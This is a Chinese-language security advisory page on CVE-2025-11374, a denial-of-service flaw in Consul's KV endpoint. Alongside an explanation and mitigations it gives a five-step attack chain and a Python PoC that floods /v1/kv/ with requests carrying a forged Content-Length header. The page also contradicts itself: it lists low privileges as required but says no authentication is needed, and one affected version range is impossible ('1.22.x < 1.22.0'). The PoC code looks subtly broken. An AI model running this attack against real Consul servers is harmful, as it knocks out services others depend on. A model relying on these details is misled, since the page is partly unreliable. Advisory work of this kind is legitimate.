CVE-2025-11374: Consul KV端点Content-Length验证错误导致拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-11374

漏洞类型

拒绝服务(Denial of Service)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

HashiCorp Consul, Consul Enterprise

漏洞概述

CVE-2025-11374是HashiCorp Consul和Consul Enterprise产品中的一个中等严重性拒绝服务漏洞。该漏洞存在于Consul的key/value（KV）端点，由于对HTTP请求中Content-Length头部验证不正确，攻击者可以利用此漏洞触发服务中断。漏洞的CVSS评分为6.5（中等），主要影响可用性维度。攻击者可通过网络远程利用此漏洞，无需高级权限即可实施攻击，这使得该漏洞在野外被利用的门槛相对较低。Consul作为一款广泛使用的服务网格和配置管理解决方案，被众多企业和组织部署在生产环境中，该漏洞的存在可能对依赖Consul进行服务发现和配置管理的系统造成严重影响。HashiCorp已在多个版本中发布了安全更新，修复了Content-Length验证逻辑中的缺陷，建议用户尽快升级到安全版本以消除风险。

技术细节

该漏洞的根本原因在于Consul KV端点对HTTP请求中Content-Length头部的验证机制存在缺陷。当客户端发送的请求包含不正确的Content-Length值时，服务器端未能正确处理这种异常情况，导致资源消耗异常或服务崩溃。具体而言，攻击者可以构造包含畸形Content-Length头的HTTP请求，当Content-Length值大于实际请求体大小时，服务器可能会等待永远不会到达的数据，导致连接挂起和资源耗尽；当Content-Length值小于实际请求体大小时，可能导致请求体被截断或解析错误。这种验证缺陷使得攻击者可以同时建立多个此类异常连接，通过累积效应耗尽服务器的连接池和内存资源，最终实现拒绝服务攻击。攻击者无需认证即可发起攻击，只需能够向Consul的KV API端点发送HTTP请求即可。对于暴露在公网或不受信任网络中的Consul实例，该漏洞尤其危险。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Consul服务版本，确认其是否属于受影响版本范围（1.18.x至1.22.x各版本）

STEP 2

步骤2: 构造攻击请求

攻击者构造包含不正确Content-Length头的HTTP POST请求到KV端点，Content-Length值设置为远大于实际请求体的数值

STEP 3

步骤3: 发送恶意请求

通过自动化工具向目标Consul服务器的/v1/kv/端点发送大量恶意请求，建立异常连接

STEP 4

步骤4: 资源耗尽

服务器等待永远不会到达的数据，导致连接挂起，累积消耗连接池、内存和CPU资源

STEP 5

步骤5: 服务中断

随着异常连接数量增加，Consul服务响应变慢甚至完全无响应，实现拒绝服务效果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
import time

def exploit_consul_dos(target_url, count=10):
    """
    PoC for CVE-2025-11374: Consul KV endpoint DoS via incorrect Content-Length validation
    
    This PoC demonstrates the vulnerability by sending requests with mismatched
    Content-Length headers to exhaust server resources.
    
    Args:
        target_url: Base URL of Consul API (e.g., 'http://target:8500')
        count: Number of malicious requests to send
    """
    headers = {
        'Content-Type': 'application/json',
        # Intentionally incorrect Content-Length to trigger vulnerability
        'Content-Length': '99999'
    }
    
    payload = '{"test": "data"}'  # Actual body is much smaller than declared Content-Length
    
    print(f'[*] Starting DoS attack on {target_url}')
    print(f'[*] Sending {count} malformed requests...')
    
    for i in range(count):
        try:
            response = requests.post(
                f'{target_url}/v1/kv/test',
                headers=headers,
                data=payload,
                timeout=30
            )
            print(f'[+] Request {i+1}/{count} sent')
        except requests.exceptions.RequestException as e:
            print(f'[-] Request {i+1}/{count} failed: {e}')
        
        time.sleep(0.5)
    
    print('[*] Attack completed')
    print('[*] Check Consul service availability')

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_url>')
        print('Example: python {sys.argv[0]} http://localhost:8500')
        sys.exit(1)
    
    exploit_consul_dos(sys.argv[1])

影响范围

Consul Community Edition < 1.22.0

Consul Enterprise 1.22.x < 1.22.0

Consul Enterprise 1.21.x < 1.21.6

Consul Enterprise 1.20.x < 1.20.8

Consul Enterprise 1.18.x < 1.18.12

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 通过网络ACL或防火墙规则限制对Consul KV API端口（默认8500）的访问，仅允许受信任的IP地址访问；2) 在Consul前端部署反向代理（如Nginx），添加Content-Length验证逻辑，过滤异常的HTTP请求；3) 监控Consul服务的连接数和资源使用情况，设置告警阈值以便及时发现异常；4) 考虑暂时禁用不使用的KV端点功能，减少攻击面。